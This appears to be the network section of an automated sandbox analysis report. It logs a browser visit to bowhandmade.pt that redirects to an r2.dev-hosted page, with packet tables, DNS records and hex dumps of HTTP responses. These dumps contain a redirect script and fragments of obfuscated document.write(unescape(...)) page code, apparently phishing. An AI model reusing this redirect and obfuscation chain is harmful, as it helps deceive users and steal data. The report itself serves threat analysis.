          Jan 10, 2025 12:22:12.435580015 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.435595036 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.435924053 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.435976982 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.436124086 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.436173916 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.436187029 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.473859072 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.473947048 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.474008083 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.522739887 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.522841930 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.522932053 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.522929907 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.522993088 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523051023 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523067951 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523111105 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523123980 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523284912 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523350954 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523369074 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523395061 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523452044 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523464918 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523508072 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523519993 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523540974 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523603916 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523616076 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523652077 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523701906 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523715973 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523739100 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523801088 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523813963 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523835897 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523884058 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523895979 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523919106 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523967981 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.523978949 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.523998976 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524054050 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.524065971 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524086952 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524146080 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.524157047 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524179935 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524235964 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.524246931 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524266958 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524324894 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.524337053 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.524389029 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.560543060 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.560616016 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.560653925 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.560655117 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.560717106 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.560770035 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607094049 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607178926 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607239962 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607296944 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607302904 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607361078 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607361078 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607495070 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607551098 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607578993 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607608080 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607623100 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607635975 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607664108 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607681036 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607727051 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.607738972 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.607789040 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.608086109 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.608150005 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.608170033 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.608220100 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.608252048 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.608315945 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.608707905 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.608776093 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.608815908 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.608871937 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.609029055 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.609097958 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.609119892 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.609175920 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.609580040 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.609630108 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.609738111 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.609790087 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.609925985 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.609981060 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.610013962 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.610094070 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.610148907 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.610197067 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.610656977 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.610709906 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.610757113 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.610810995 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.610976934 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.611017942 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.611068964 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.611116886 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.611124039 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.611169100 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.611531019 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.611591101 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.611689091 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.611752033 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.647239923 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.647327900 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.647356987 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.647413969 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.694075108 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.694252014 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.694309950 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.694391012 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.694667101 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.694717884 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.694753885 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.694786072 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.694818020 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.694998026 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695046902 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695071936 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.695091009 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695139885 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.695476055 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695517063 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695539951 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.695560932 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695615053 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.695642948 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695703983 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.695717096 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695868015 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.695928097 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.696712017 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.696743011 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:16.810636997 CET804972384.201.210.39192.168.2.4
          Jan 10, 2025 12:22:16.810750961 CET4972380192.168.2.484.201.210.39
          Jan 10, 2025 12:22:16.810834885 CET4972380192.168.2.484.201.210.39
          Jan 10, 2025 12:22:16.815599918 CET804972384.201.210.39192.168.2.4
          Jan 10, 2025 12:22:18.850509882 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:18.850581884 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:18.850630999 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:20.776499987 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:20.776526928 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:26.992501974 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:26.992603064 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:26.992698908 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:28.776618004 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:28.776688099 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:29.970906973 CET5516053192.168.2.4162.159.36.2
          Jan 10, 2025 12:22:29.975785017 CET5355160162.159.36.2192.168.2.4
          Jan 10, 2025 12:22:29.975867987 CET5516053192.168.2.4162.159.36.2
          Jan 10, 2025 12:22:29.980696917 CET5355160162.159.36.2192.168.2.4
          Jan 10, 2025 12:22:30.621220112 CET5516053192.168.2.4162.159.36.2
          Jan 10, 2025 12:22:30.626349926 CET5355160162.159.36.2192.168.2.4
          Jan 10, 2025 12:22:30.626396894 CET5516053192.168.2.4162.159.36.2
          Jan 10, 2025 12:23:08.331186056 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:08.331227064 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:08.331317902 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:08.331566095 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:08.331582069 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:08.976782084 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:08.977229118 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:08.977253914 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:08.977552891 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:08.977880955 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:08.977940083 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:09.025052071 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:18.902417898 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:18.902508020 CET44355256216.58.212.132192.168.2.4
          Jan 10, 2025 12:23:18.902667046 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:20.777600050 CET55256443192.168.2.4216.58.212.132
          Jan 10, 2025 12:23:20.777621031 CET44355256216.58.212.132192.168.2.4
          TimestampSource PortDest PortSource IPDest IP
          Jan 10, 2025 12:22:03.697041988 CET53615131.1.1.1192.168.2.4
          Jan 10, 2025 12:22:03.747277975 CET53545151.1.1.1192.168.2.4
          Jan 10, 2025 12:22:04.938939095 CET53523151.1.1.1192.168.2.4
          Jan 10, 2025 12:22:08.262876987 CET5763453192.168.2.41.1.1.1
          Jan 10, 2025 12:22:08.262932062 CET6431853192.168.2.41.1.1.1
          Jan 10, 2025 12:22:08.269855976 CET53643181.1.1.1192.168.2.4
          Jan 10, 2025 12:22:08.270065069 CET53576341.1.1.1192.168.2.4
          Jan 10, 2025 12:22:09.251486063 CET5308053192.168.2.41.1.1.1
          Jan 10, 2025 12:22:09.253854990 CET6070453192.168.2.41.1.1.1
          Jan 10, 2025 12:22:09.357829094 CET53607041.1.1.1192.168.2.4
          Jan 10, 2025 12:22:09.383071899 CET53530801.1.1.1192.168.2.4
          Jan 10, 2025 12:22:11.599960089 CET6304353192.168.2.41.1.1.1
          Jan 10, 2025 12:22:11.600311041 CET5452453192.168.2.41.1.1.1
          Jan 10, 2025 12:22:11.608366013 CET53630431.1.1.1192.168.2.4
          Jan 10, 2025 12:22:11.610940933 CET53545241.1.1.1192.168.2.4
          Jan 10, 2025 12:22:17.562819004 CET138138192.168.2.4192.168.2.255
          Jan 10, 2025 12:22:21.861532927 CET53643411.1.1.1192.168.2.4
          Jan 10, 2025 12:22:29.970340967 CET5349623162.159.36.2192.168.2.4
          Jan 10, 2025 12:22:30.641019106 CET5106253192.168.2.41.1.1.1
          Jan 10, 2025 12:22:30.648452997 CET53510621.1.1.1192.168.2.4
          Jan 10, 2025 12:23:08.323431969 CET4992253192.168.2.41.1.1.1
          Jan 10, 2025 12:23:08.330207109 CET53499221.1.1.1192.168.2.4
          Jan 10, 2025 12:23:24.041119099 CET5953153192.168.2.41.1.1.1
          Jan 10, 2025 12:23:24.047950029 CET53595311.1.1.1192.168.2.4
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jan 10, 2025 12:22:08.262876987 CET192.168.2.41.1.1.10xc7abStandard query (0)www.google.comA (IP address)IN (0x0001)false
          Jan 10, 2025 12:22:08.262932062 CET192.168.2.41.1.1.10xa50cStandard query (0)www.google.com65IN (0x0001)false
          Jan 10, 2025 12:22:09.251486063 CET192.168.2.41.1.1.10x66c0Standard query (0)bowhandmade.ptA (IP address)IN (0x0001)false
          Jan 10, 2025 12:22:09.253854990 CET192.168.2.41.1.1.10x4f0aStandard query (0)bowhandmade.pt65IN (0x0001)false
          Jan 10, 2025 12:22:11.599960089 CET192.168.2.41.1.1.10xeeb5Standard query (0)pub-093df4ea445740f9b5bda34d3a4b96a1.r2.devA (IP address)IN (0x0001)false
          Jan 10, 2025 12:22:11.600311041 CET192.168.2.41.1.1.10x229fStandard query (0)pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev65IN (0x0001)false
          Jan 10, 2025 12:22:30.641019106 CET192.168.2.41.1.1.10xf432Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
          Jan 10, 2025 12:23:08.323431969 CET192.168.2.41.1.1.10x8774Standard query (0)www.google.comA (IP address)IN (0x0001)false
          Jan 10, 2025 12:23:24.041119099 CET192.168.2.41.1.1.10xebacStandard query (0)www.google.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jan 10, 2025 12:22:08.269855976 CET1.1.1.1192.168.2.40xa50cNo error (0)www.google.com65IN (0x0001)false
          Jan 10, 2025 12:22:08.270065069 CET1.1.1.1192.168.2.40xc7abNo error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
          Jan 10, 2025 12:22:09.383071899 CET1.1.1.1192.168.2.40x66c0No error (0)bowhandmade.pt109.71.40.47A (IP address)IN (0x0001)false
          Jan 10, 2025 12:22:11.608366013 CET1.1.1.1192.168.2.40xeeb5No error (0)pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev172.66.0.235A (IP address)IN (0x0001)false
          Jan 10, 2025 12:22:11.608366013 CET1.1.1.1192.168.2.40xeeb5No error (0)pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev162.159.140.237A (IP address)IN (0x0001)false
          Jan 10, 2025 12:22:30.648452997 CET1.1.1.1192.168.2.40xf432Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
          Jan 10, 2025 12:23:08.330207109 CET1.1.1.1192.168.2.40x8774No error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
          Jan 10, 2025 12:23:24.047950029 CET1.1.1.1192.168.2.40xebacNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
          • bowhandmade.pt
          • https:
            • pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449740109.71.40.474433568C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2025-01-10 11:22:10 UTC662OUTGET /.jan2 HTTP/1.1
          Host: bowhandmade.pt
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: navigate
          Sec-Fetch-User: ?1
          Sec-Fetch-Dest: document
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2025-01-10 11:22:10 UTC243INHTTP/1.1 301 Moved Permanently
          Server: nginx
          Date: Fri, 10 Jan 2025 11:22:10 GMT
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 237
          Connection: close
          Location: https://bowhandmade.pt/.jan2/
          X-Scale: YXBvY2FzQGdpdGh1Yg==
          2025-01-10 11:22:10 UTC237INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6f 77 68 61 6e 64 6d 61 64 65 2e 70 74 2f 2e 6a 61 6e 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bowhandmade.pt/.jan2/">here</a>.</p></body></html>


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449741109.71.40.474433568C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2025-01-10 11:22:10 UTC663OUTGET /.jan2/ HTTP/1.1
          Host: bowhandmade.pt
          Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: navigate
          Sec-Fetch-User: ?1
          Sec-Fetch-Dest: document
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2025-01-10 11:22:11 UTC304INHTTP/1.1 200 OK
          Server: nginx
          Date: Fri, 10 Jan 2025 11:22:11 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          X-Powered-By: PHP/8.1.31
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          X-Scale: YXBvY2FzQGdpdGh1Yg==
          2025-01-10 11:22:11 UTC325INData Raw: 31 33 39 0d 0a 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 77 65 62 5f 75 72 6c 20 3d 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 63 6f 6e 73 74 20 74 65 73 74 31 20 3d 20 60 24 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 7d 2f 2f 24 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 7d 24 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 7d 60 3b 63 6f 6e 73 74 20 63 6c 65 61 6e 5f 75 72 6c 20 3d 20 77 65 62 5f 75 72 6c 2e 72 65 70 6c 61 63 65 41 6c 6c 28 74 65 73 74 31 2e 74 6f 53 74 72 69 6e 67 28 29 2c 22 22 29 3b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 68 74 74 70 73 3a 2f 2f 70 75 62 2d 30 39 33 64 66 34 65 61 34
          Data Ascii: 139<script>const web_url = window.location.href;const test1 = `${window.location.protocol}//${window.location.hostname}${window.location.pathname}`;const clean_url = web_url.replaceAll(test1.toString(),"");window.location.replace("https://pub-093df4ea4


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.449744172.66.0.2354433568C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2025-01-10 11:22:12 UTC716OUTGET /oblee.html HTTP/1.1
          Host: pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: cross-site
          Sec-Fetch-Mode: navigate
          Sec-Fetch-Dest: document
          Referer: https://bowhandmade.pt/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2025-01-10 11:22:12 UTC284INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 11:22:12 GMT
          Content-Type: text/html
          Content-Length: 288533
          Connection: close
          Accept-Ranges: bytes
          ETag: "973e87ce1db7af23a53ef3440b59d826"
          Last-Modified: Fri, 10 Jan 2025 04:19:13 GMT
          Server: cloudflare
          CF-RAY: 8ffc49b1d94dc338-EWR
          2025-01-10 11:22:12 UTC1085INData Raw: 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 54 67 35 4e 6a 59 77 4d 54 4d 35 4e 69 77 79 4f 44 59 33 4e 7a 59 34 4e 6a 49 31 22 3e 0d 0a 3c 21 2d 2d 20 63 6f 64 65 20 62 79 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 74 6d 6c 2d 63 6f 64 65 2d 67 65 6e 65 72 61 74 6f 72 2e 63 6f 6d 20 2d 2d 3e 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 32 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 30 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 36 44 25 36 35 25 37 34 25 36 31 25 32 30 25 36 38 25 37 34
          Data Ascii: <script nonce="MTg5NjYwMTM5NiwyODY3NzY4NjI1">... code by https://www.html-code-generator.com -->document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%3E%0A%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74
          2025-01-10 11:22:12 UTC1369INData Raw: 43 25 36 38 25 33 34 25 32 43 25 36 38 25 33 35 25 32 43 25 36 38 25 33 36 25 32 43 25 37 30 25 32 43 25 36 32 25 36 43 25 36 46 25 36 33 25 36 42 25 37 31 25 37 35 25 36 46 25 37 34 25 36 35 25 32 43 25 37 30 25 37 32 25 36 35 25 32 43 25 36 31 25 32 43 25 36 31 25 36 32 25 36 32 25 37 32 25 32 43 25 36 31 25 36 33 25 37 32 25 36 46 25 36 45 25 37 39 25 36 44 25 32 43 25 36 31 25 36 34 25 36 34 25 37 32 25 36 35 25 37 33 25 37 33 25 32 43 25 36 32 25 36 39 25 36 37 25 32 43 25 36 33 25 36 39 25 37 34 25 36 35 25 32 43 25 36 33 25 36 46 25 36 34 25 36 35 25 32 43 25 36 34 25 36 35 25 36 43 25 32 43 25 36 34 25 36 36 25 36 45 25 32 43 25 36 35 25 36 44 25 32 43 25 36 39 25 36 44 25 36 37 25 32 43 25 36 39 25 36 45 25 37 33 25 32 43 25 36 42 25 36 32 25 36
